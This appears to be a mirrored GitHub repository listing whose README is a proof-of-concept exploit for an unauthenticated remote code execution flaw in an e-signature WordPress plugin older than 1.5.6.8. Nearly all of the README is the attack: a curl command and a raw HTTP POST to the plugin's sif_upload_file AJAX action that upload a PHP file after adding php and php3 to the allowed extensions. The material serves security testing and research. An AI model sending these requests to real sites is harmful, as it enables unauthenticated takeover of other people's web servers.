https://github.com/randomrobbiebf/e-signature-poc
e-signature < 1.5.6.8 - Unauthenticated Remote Code Execution
https://github.com/randomrobbiebf/e-signature-poc
Last synced: 3 months ago
JSON representation
e-signature < 1.5.6.8 - Unauthenticated Remote Code Execution
- Host: GitHub
- URL: https://github.com/randomrobbiebf/e-signature-poc
- Owner: RandomRobbieBF
- Created: 2023-06-15T12:30:53.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2023-06-15T12:36:51.000Z (almost 3 years ago)
- Last Synced: 2025-01-21T05:41:43.657Z (over 1 year ago)
- Size: 1.95 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# e-signature-poc
e-signature < 1.5.6.8 - Unauthenticated Remote Code Execution
Curl
---
```
curl "http://wordpress.lan/wp-admin/admin-ajax.php?action=sif_upload_file" -X POST -H "Content-Type: multipart/form-data" -F "file=@test.php" -F "extensions=jpg,png,pdf,php" -F "filesize=2" -F "sif_name=example_file"
```
RAW_HTTP
---
```
POST /wp-admin/admin-ajax.php?action=sif_upload_file HTTP/1.1
Host: wordpress.lan
User-Agent: curl/7.88.1
Accept: */*
Content-Length: 544
Content-Type: multipart/form-data; boundary=------------------------04406918fd5cbc2b
Connection: close
--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="file"; filename="test.php3"
Content-Type: application/octet-stream
--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="extensions"
jpg,png,pdf,php3
--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="filesize"
2
--------------------------04406918fd5cbc2b
Content-Disposition: form-data; name="sif_name"
example_file3
--------------------------04406918fd5cbc2b--
```